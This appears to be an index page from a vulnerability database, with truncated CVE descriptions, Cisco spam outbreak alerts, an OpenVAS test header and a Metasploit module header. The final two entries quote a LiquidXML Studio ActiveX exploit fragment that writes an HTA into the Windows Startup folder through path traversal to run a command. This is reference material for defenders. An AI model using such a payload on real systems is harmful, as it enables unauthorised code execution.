PT-2013-5454 · Esri · Esri Arcgis For Server

Name of the Vulnerable Software and Affected Versions: Esri ArcGIS for Server versions 10.1 through 10.2 Description: The mobile-upload feature in Esri ArcGIS for Server allows remote authenticated users to upload .exe files by leveraging publisher or administrator privileges. Recommendations: Fo...

Threat Outbreak Alert: Malicious Attachment Email Messages on September 16, 2013

Medium Alert ID: 30835 First Published: 2013 September 17 15:43 GMT Version: 1 Summary Cisco Security has detected significant activity related to Italian-language spam email messages that claim to contain an attachment for the recipient. The text in the email message attempts to convince the...

Threat Outbreak Alert: Fake Document Attachment Email Messages on September 14, 2013.

Medium Alert ID: 30799 First Published: 2013 September 16 14:39 GMT Version: 1 Summary Cisco Security has detected significant activity related to a spam email message that claims to contain a document attachment for the recipient. The text in the email message attempts to convince the recipient ...

Unrestricted file upload

Unrestricted file upload vulnerability in admin/uploadImage.html in SearchBlox before 7.5 build 1 allows remote attackers to execute arbitrary code by uploading an executable file with the image/jpeg content type, and then accessing this file via unspecified vectors, as demonstrated by access to ...

Threat Outbreak Alert: Fake Money Transfer Notification Email Messages on August 21, 2013

Medium Alert ID: 30479 First Published: 2013 August 21 13:18 GMT Version: 1 Summary Cisco Security has detected significant activity related to spam email messages that claim to contain a money transfer notification for the recipient. The text in the email message attempts to convince the recipie...

Threat Outbreak Alert: Fake UPS Parcel Notification Email Messages on August 15, 2013

Medium Alert ID: 30435 First Published: 2013 August 15 17:56 GMT Version: 1 Summary Cisco Security has detected significant activity related to spam email messages that claim to contain a UPS parcel notification for the recipient. The text in the email message attempts to convince the recipient t...

Mozilla Thunderbird Multiple Vulnerabilities - August12 (Mac OS X)

This host is installed with Mozilla Thunderbird and is prone to multiple vulnerabilities. OpenVAS Vulnerability Test $Id: gbmozillathunderbirdmultvulnaug12macosx.nasl 6074 2017-05-05 09:03:14Z teissa $ Mozilla Thunderbird Multiple Vulnerabilities - August12 Mac OS X Authors: Arun Kallavi Copyrigh...

Threat Outbreak Alert: Fake German Payment Form Attachment Email Messages on June 25, 2014

Medium Alert ID: 30027 First Published: 2013 July 11 11:55 GMT Last Updated: 2014 June 26 11:57 GMT Version: 9 Summary Cisco Security has detected significant activity related to German-language spam email messages that claim to contain a payment form notification for the recipient. The text in t...

Design/Logic Flaw

Alstom Grid MiCOM S1 Agile before 1.0.3 and Alstom Grid MiCOM S1 Studio use weak permissions for the MiCOM S1 %PROGRAMFILES% directory, which allows local users to gain privileges via a Trojan horse executable file...

CVE-2013-1700

The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location...

Design/Logic Flaw

The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location...

ZPanel zsudo - Local Privilege Escalation (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' require 'msf/core/post/common' require...

Threat Outbreak Alert: Email Messages with Malicious File Attachments on June 24, 2013

Medium Alert ID: 29763 First Published: 2013 June 24 14:58 GMT Version: 1 Summary Cisco Security has detected significant activity related to spam email messages that contain an attachment for the recipient. The text in the email message attempts to convince the recipient to open the attachment a...

Threat Outbreak Alert: Fake Contract Information Email Messages on June 20, 2013

Medium Alert ID: 29736 First Published: 2013 June 20 18:53 GMT Version: 1 Summary Cisco Security has detected significant activity related to German-language spam email messages that claim to contain contract information for the recipient. The text in the email message attempts to persuade the...

CVE-2012-6558

Heap-based buffer overflow in HeavenTools PE Explorer 1.99 R6 allows remote attackers to execute arbitrary code via the size value for a string in the resource section of a Portable Executable PE file...

Heap overflow

Heap-based buffer overflow in HeavenTools PE Explorer 1.99 R6 allows remote attackers to execute arbitrary code via the size value for a string in the resource section of a Portable Executable PE file...

CVE-2013-3496

Infotecs ViPNet Client 3.2.10 15632 and earlier, ViPNet Coordinator 3.2.10 15632 and earlier, ViPNet Personal Firewall 3.1 and earlier, and ViPNet SafeDisk 4.1 0.5643 and earlier use weak permissions Everyone: Full Control for a folder under %PROGRAMFILES%\Infotecs, which allows local users to ga...

Design/Logic Flaw

Infotecs ViPNet Client 3.2.10 15632 and earlier, ViPNet Coordinator 3.2.10 15632 and earlier, ViPNet Personal Firewall 3.1 and earlier, and ViPNet SafeDisk 4.1 0.5643 and earlier use weak permissions Everyone: Full Control for a folder under %PROGRAMFILES%\Infotecs, which allows local users to ga...

LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day

Exploit for windows platform in category local exploits var sofa = "..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\thedoctorisin.hta"; var king = "Oh noz, Look what DrIDE did... var x=new ActiveXObject"WScript.Shell"; x.Exec"CALC.EXE"; ";...

LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation

var sofa = "..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\thedoctorisin.hta"; var king = "Oh noz, Look what DrIDE did... var x=new ActiveXObject"WScript.Shell"; x.Exec"CALC.EXE"; "; target.OpenFilesofa,1; target.AppendStringking; LiquidXML...